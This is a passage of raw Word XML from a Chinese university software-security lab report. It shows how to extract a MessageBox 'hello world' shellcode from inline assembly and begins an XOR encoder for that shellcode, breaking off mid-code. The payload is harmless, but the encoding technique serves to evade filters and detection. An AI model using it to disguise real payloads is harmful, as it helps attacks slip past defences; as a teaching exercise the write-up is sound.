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《软件安全》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>冯思程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2112213</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">班级： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1120（张健）</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ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Shellcode编码实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>复现第五章实验三，并将产生的编码后的shellcode在示例5-4中进行验证，阐述shellcode编码的原理，shellcode提取的思想。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得核心shellcode代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（调用 Messagebox 输出“hello world”的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Shellcode）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先，要获得到Messagebox函数的入口地址，这里我采用了第二种方法，调用GetProcAddress 函数检索指定的动态链接库（DLL）中的输出库函数地址。代码如下：</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#include &lt;windows.h&gt;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#include &lt;stdio.h&gt;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int main()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HINSTANCE LibHandle;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FARPROC ProcAdd;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LibHandle = LoadLibrary("user32");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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="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获取 </w:t>
      </w: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user32.dll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="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的地址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printf("user32 = 0x%x \n", LibHandle);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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="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获取 </w:t>
      </w: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MessageBoxA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="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的地址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ProcAdd=(FARPROC)GetProcAddress(LibHandle,"MessageBoxA");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printf("MessageBoxA = 0x%x \n", ProcAdd);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getchar(); </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="none"/>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 xml:space="preserve">return 0; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:gradFill>
              <w14:gsLst>
                <w14:gs w14:pos="0">
                  <w14:srgbClr w14:val="E30000"/>
                </w14:gs>
                <w14:gs w14:pos="100000">
                  <w14:srgbClr w14:val="760303"/>
                </w14:gs>
              </w14:gsLst>
              <w14:lin w14:scaled="0"/>
            </w14:gradFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:gradFill>
              <w14:gsLst>
                <w14:gs w14:pos="0">
                  <w14:srgbClr w14:val="E30000"/>
                </w14:gs>
                <w14:gs w14:pos="100000">
                  <w14:srgbClr w14:val="760303"/>
                </w14:gs>
              </w14:gsLst>
              <w14:lin w14:scaled="0"/>
            </w14:gradFill>
          </w14:textFill>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="25457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545715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>得到了Messagebox函数的地址是0x77D507EA。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后，编写调用 Messagebox 输出“hello world”的Shellcode，这里“hello world”的ASCII代码是\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x20，利用esp获取字符串的地址，编写代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>void main()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">LoadLibrary("user32.dll");//加载 user32.dll </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_asm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xor ebx,ebx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push ebx//push 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push 20646C72h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push 6F77206Fh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push 6C6C6568h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mov eax, esp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push ebx//push 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push eax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push eax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push ebx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mov eax, 77d507eah// 77d507eah 这个是 MessageBox 函数在系统中的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，在上文已经获取到。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>call eax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="C00000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3158490"/>
            <wp:effectExtent l="0" t="0" r="1016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3158490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后进入反汇编窗口，找到xor ebx,ebx语句和call eax语句，找到这两个语句对应的地址，第一句地址是0x0040103c，第二句地址是0x00401059，于是上文代码中汇编代码部分对应的机器码是这两个地址之间的机器码，call要向后读两个bytes，于是机器码是从0x0040103c读到0x0040105a，机器码即是（也是获取到的shellcode代码）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\x33\xDB\x53\x68\x72\x6C\x64\x20\x68\x6F\x20\x77\x6F\x68\x68\x65\x6C\x6C\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\xD5\x77\xFF\xD0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>截图如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3158490"/>
            <wp:effectExtent l="0" t="0" r="1016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3158490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后进行对上文获取到的核心shellcode代码进行编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，使用异或方法进行加密,代码如下：（将上文得到的shellcode输入，结尾要加一个0x90空指令作为结束符。）</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#include &lt;stdlib.h&gt;</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#include &lt;string.h&gt;</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#include &lt;stdio.h&gt;</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void encoder(char* input, unsigned char key)</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 xml:space="preserve">int i = 0, len = 0; </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FILE * fp;</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len = strlen(input);</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 xml:space="preserve">unsigned char * output = (unsigned char *)malloc(len + 1); </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for (i = 0; i&lt;len; i++)</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 xml:space="preserve">output[i] = input[i] ^ key; </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 xml:space="preserve">fp = fopen("encode.txt", "w+"); </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fprintf(fp, "\"");</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for (i = 0; i&lt;len; i++)</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fprintf(fp, "\\x%0.2x", output[i]);</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if ((i + 1) % 16 == 0)</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fprintf(fp, "\"\n\"");</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fprintf(fp, "\"");</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fclose(fp);</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printf("dump the encoded shellcode to encode.txt OK!\n");</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free(output);</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int main()</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 xml:space="preserve">char sc[] = 